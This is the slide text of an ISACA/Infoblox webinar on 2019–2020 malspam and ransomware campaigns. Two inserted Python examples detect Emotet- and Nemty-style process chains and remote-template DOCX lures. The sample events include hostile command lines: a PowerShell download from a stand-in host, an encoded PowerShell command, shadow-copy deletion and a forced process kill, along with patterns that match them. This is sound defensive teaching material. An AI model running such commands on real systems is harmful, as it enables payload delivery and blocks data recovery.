MALWARE THREATS:
THE CURRENT SCOPE OF THESE THREATS
AND TOOLS TO SHUT THEM DOWN
MICHAEL ZUCKERMAN, PRODUCT MANAGEMENT, INFOBLOX
WEBINAR INFORMATION & QUICK TIPS
• Use the HELP icon at the bottom for FAQs and system requirements.
• You must view the live or recorded webinar for the required amount of time (50 minutes). We encourage you to stay on and watch the entire webinar.
• Check the CPE Credit and Certificate window to view the timer.
• Your CPE Certificate will automatically appear in the ISACA CPE RECORDS tab on the MyISACA page in your account after completing the required viewing time.
• Please be patient. This process could take up to 24 hours for your CPE Certificate to appear in your account and another 24 hours for your CPE Credit to be applied to your CPE Manager.
TODAY’S SPEAKER
Michael Zuckerman
Product Management
Infoblox
AGENDA
The Good
• The number of ransomware incidents in 2018 decreased substantially.
The Bad
• Enterprise-focused ransomware attacks are up 12% in 2019.
• The pace continues to grow, as ransomware attacks in healthcare grew 350% in Q4 2019.
The Ugly
• These targeted ransomware attacks are the most dangerous and most sophisticated.
TARGETED RANSOMWARE GOES AFTER THE ENTERPRISE
In 2019, targeted ransomware attacks hit multiple cities in the United States and selected international targets.
• SWIFT-Themed Campaigns
• Maze Ransomware
Overview
• From 24 March through 2 April, Infoblox observed several malicious spam (malspam) campaigns delivering Formbook malware.
• The campaigns are connected by a Coronavirus or COVID-19-related theme in their subject lines or file attachment names.
Attack Chain
• … file, the malware performs process hollowing and injects itself into the Microsoft File Explorer process.
Overview
• From 21 to 24 March, Infoblox observed another malicious spam (malspam) email campaign that used a fraudulent Coronavirus alert from the World Health Organization (WHO) to deliver Trickbot banking malware.
Attack Chain
• When the recipient opens the malicious Word document and enables macros, the macros within the document create a new directory, C:\netstats, and generate two files within it.
Attack Chain
• … and decompressed the archive file, the executable inside launched the malware, gathered victim information, and then reached out to send the data to an FTP or SMTP server.
Attack Chain
• … two additional executables.
Overview
• During the first week of March, LokiBot infostealer joined the list of malware being distributed by threat actor(s) taking advantage of the fear and interest in the spread of Coronavirus (COVID-19).
Attack Chain
• … reaches out to a Google Drive and downloads a file matching the naming pattern from February’s campaign.
Overview
• Nemty ransomware made its first attempt to target English-speaking victims with a malspam campaign.
• Nemty only recently started using malspam as a distribution method.
• Nemty malspam campaigns have been restricted to targets in the Asia-Pacific region (APAC).
Attack Chain
• When the victim extracts and executes the malicious JavaScript file contained within the ZIP file attachment, it launches a PowerShell command that retrieves and executes the Nemty ransomware payload from a remote server.
• Nemty uses the Windows vssadmin command to delete any existing shadow copies of files to prevent the victim from easily restoring them.
• Nemty uses the taskkill command to stop processes and services that may prevent it from successfully encrypting files.
SWIFT-THEMED CAMPAIGNS
Overview
• Malspam leverages themes referencing the SWIFT payments network.
• The malspam campaigns were delivering several malware families, including Agent Tesla keylogger, Lokibot infostealer, and more.
• The TTPs appear similar to activity conducted by the threat actor SWEED as reported by Talos in 2019.
Customer Impact
• Agent Tesla can capture and store keystrokes, steal credentials, and exfiltrate data to a command and control (C2) server, potentially via email messages to a remote mail server.
Campaign Analysis
• All the emails we discovered used the acronym “SWIFT” either in the subject line or the attachment’s file name.
Attack Chain
• … across the campaigns, but all required the recipient to open an attached file that was often compressed.
URSNIF BANKING TROJAN
Overview
• Between 23 and 24 January, security researcher Brad Duncan reported two separate malicious spam campaigns that used compressed Microsoft Word documents with malicious macros to deliver Ursnif malware.
Customer Impact
• Ursnif is a variant of the Gozi banking trojan that can steal credentials, cryptocurrency wallets, and email information. Upon infection, Ursnif injects its code into the Internet Explorer (IE) browser, then uses IE to manage communications with its command and control (C2), including follow-on downloads.
Campaign Analysis
• The Ursnif campaign sent messages that appeared to be replies to existing email chains and asked the recipient(s) to open an attached ZIP file with a specific password.
Attack Chain
HOW EMOTET STOLE CHRISTMAS
Overview
• Leading up to 25 December, Infoblox observed an email campaign themed around both Christmas and Swedish environmental activist Greta Thunberg to lure recipients into opening Microsoft Word documents with malicious macros that infected victims with the Emotet information stealer.
Attack Chain
• When the recipient opens the malicious Word document and enables macros, the macros decode and execute a PowerShell command that downloads the Emotet payload from a compromised website, and then executes it.
• Upon execution, Emotet attempts to spread laterally across the victim’s network to infect additional devices while stealing sensitive information from all infected devices.
• Throughout the infection process Emotet contacts its C2 servers to transmit stolen credentials, receive new instructions, and retrieve additional malware payloads.
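The Nemty chain (JavaScript in a ZIP runs PowerShell, which then calls vssadmin and taskkill) and the Emotet chain (Word macro decodes and runs a PowerShell download) leave the same kind of process-creation trail. The following is an added example, not code from the webinar or from Infoblox, that runs four small rules over constructed Sysmon-style events; the event fields, the rule names, the file paths and the example.invalid URL are assumptions for illustration.

```python
import re

# Constructed process-creation events (Sysmon-style, reduced to three fields).
# Hypothetical sample data assumed for this example, not telemetry from the report.
SAMPLE_EVENTS = [
    # Emotet-style: Word macro spawns PowerShell with an encoded command
    {"id": 1, "parent": r"C:\Office\WINWORD.EXE", "image": r"C:\PS\powershell.exe",
     "cmdline": "powershell -w hidden -enc QUJD"},  # QUJD is a constructed placeholder
    # Nemty-style: .js from a ZIP runs PowerShell, which then removes recovery options
    {"id": 2, "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\PS\powershell.exe",
     "cmdline": "powershell -nop -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/n','t.exe')\""},
    {"id": 3, "parent": r"C:\PS\powershell.exe", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"id": 4, "parent": r"C:\PS\powershell.exe", "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /F /IM sqlservr.exe"},
    # Benign administration that must not fire
    {"id": 5, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
    {"id": 6, "parent": r"C:\Windows\explorer.exe", "image": r"C:\PS\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
]

LAUNCHERS = {"winword.exe", "excel.exe", "wscript.exe", "cscript.exe"}

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()  # basename, case-folded

def r_launcher_to_powershell(ev):
    """Office app or script host spawning PowerShell (the macro / .js stage)."""
    return _name(ev["parent"]) in LAUNCHERS and _name(ev["image"]) == "powershell.exe"
def r_powershell_fetch(ev):
    """PowerShell using a download method or an encoded command (payload retrieval)."""
    pat = r"downloadstring|downloadfile|\s-e(nc|ncodedcommand)?\b"
    return _name(ev["image"]) == "powershell.exe" and re.search(pat, ev["cmdline"], re.I) is not None
def r_shadow_deletion(ev):
    """vssadmin deleting shadow copies, the recovery-inhibition step before encryption."""
    return _name(ev["image"]) == "vssadmin.exe" and re.search(r"delete\s+shadows", ev["cmdline"], re.I) is not None
def r_forced_kill(ev):
    """taskkill forcing an image to stop, used to release files for encryption."""
    return _name(ev["image"]) == "taskkill.exe" and re.search(r"/f\b.*/im\b|/im\b.*/f\b", ev["cmdline"], re.I) is not None

RULES = [r_launcher_to_powershell, r_powershell_fetch, r_shadow_deletion, r_forced_kill]

def detect(events):
    """Return (rule_name, event id) for every match, in event order."""
    return [(r.__name__, ev["id"]) for ev in events for r in RULES if r(ev)]

def chain_stages(events):
    """Distinct stages observed; three or more on one host is a strong chain signal."""
    return sorted({name for name, _ in detect(events)})
```

Each rule alone is noisy on an admin workstation; the value is in correlating several stages on one host within a short window.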
DRIDEX BANKING TROJAN
Overview
• In December we observed a malicious email campaign distributing Dridex banking trojan. Like our first Dridex report in June, the emails had password-protected Microsoft Office document attachments that used macros with hardcoded URLs to download and execute Dridex payloads.
Attack Chain
• … prompted to enter a 3 to 4-digit password found in the body of the email.
Overview
• On 7 November, we observed two email campaigns distributing the banking trojan Dreambot, which is a variant of Ursnif.
• Threat actors have distributed Dreambot since 2016, targeting financial customers in Australia, Italy, Switzerland, the U.K., the U.S., Poland, and Canada.
Attack Chain
• When the email recipient opens the DOCX attachment, Microsoft Office downloads the externally linked template.
• Office then applies the template and opens the DOCX file.
• This triggers the VBA code in the template.
• The VBA code runs PowerShell commands to download and execute Dreambot using Regsvr32.exe.
• The malware injects itself into Explorer.exe and runs CMD.exe commands to profile the user’s computer.
• Dreambot then sends this information to its command and control (C2) server.
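The Dreambot lure works because the DOCX itself carries no macro: the link to the remote template is an attachedTemplate relationship with an external target, declared in the document's relationship parts. The following is an added example, not from the webinar or from Infoblox, that builds a constructed DOCX in memory and flags such relationships; build_docx, external_templates, verdict and the example.invalid URL are assumptions for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type Word uses for an attached (.dotm) template
TEMPLATE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

def external_templates(docx_bytes):
    """Return external attachedTemplate targets found in any .rels part of a DOCX."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                # A local template (no TargetMode) is normal; a remote one is the lure pattern
                if rel.get("Type") == TEMPLATE_REL and rel.get("TargetMode") == "External":
                    found.append(rel.get("Target"))
    return found

def build_docx(template_target=None, external=True):
    """Construct a minimal DOCX in memory (a constructed sample, not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        if template_target:
            mode = ' TargetMode="External"' if external else ""
            z.writestr("word/_rels/settings.xml.rels",
                       f'<Relationships xmlns="{PKG_NS}"><Relationship Id="rId1" '
                       f'Type="{TEMPLATE_REL}" Target="{template_target}"{mode}/></Relationships>')
    return buf.getvalue()

def verdict(docx_bytes):
    """Short triage label for an attachment scanned at the mail gateway."""
    return "remote-template" if external_templates(docx_bytes) else "clean"
```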
RIG EXPLOIT KIT DROPS INFOSTEALER & CRYSIS RANSOMWARE
Overview
• On 17 November, Broad Analysis reported a campaign that used Rig exploit kit to distribute an infostealer known as Predator The Thief, followed by a variant of CrySIS ransomware.
Attack Chain
MAZE RANSOMWARE
Overview
• On 29 October, we detected a campaign distributing Maze ransomware (a variant of ChaCha ransomware) to Italian-speaking users.
• The emails appeared to be from the Italian Revenue Agency and instructed users to open an attached Microsoft Word document with “financial guidelines.”
Attack Chain
• Each Word document was embedded with a macro that downloaded Maze ransomware from the actor-controlled server.
• The macro then wrote the ransomware payload to C:\Windows\Temp\wordupd.tmp and executed it.
• After Maze encrypted the victim’s files, it made HTTP POST requests to several IP-based URLs that began with the first octet 91. Only a few of these requests returned a 200 response code, indicating a successful connection.
PsiXBot INFOSTEALER USES DNS OVER HTTPS
Overview
• On 11 December, Malware Traffic Analysis reported on a campaign in which a threat actor was delivering PsiXBot via the Spelevo exploit kit (EK).
• PsiXBot steals information, adds computers to its botnet and uses DNS over HTTPS (DoH).
Attack Chain
VULNERABILITIES & MITIGATION
Let's Not Forget the RDP Attack Vector - in our Last Report
Infoblox delivers the next-level network experience with its Secure Cloud-Managed Network Services.
As a pioneer in providing the world’s most reliable, secure, and automated networks, we are relentless in our pursuit of next-level network simplicity.
A recognized industry leader, Infoblox has 50 percent market share comprised of 8,000 customers, including 350 of the Fortune 500.
You assume the entire risk for the use of the content and acknowledge that: ISACA has designed the content primarily as an educational resource for IT professionals and therefore the content should not be deemed either to set forth all appropriate procedures, tests, or controls or to suggest that other procedures, tests, or controls that are not included may not be appropriate; ISACA does not claim that use of the content will assure a successful outcome and you are responsible for applying professional judgement to the specific circumstances presented in determining the appropriate procedures, tests, or controls.
Copyright © 2020 by the Information Systems Audit and Control Association, Inc. (ISACA). All rights reserved. This webinar may not be used, copied, reproduced, modified, distributed, displayed, stored in a retrieval system, or transmitted in any form by any means (electronic, mechanical, photocopying, recording or otherwise).
THANK YOU FOR ATTENDING THIS ISACA WEBINAR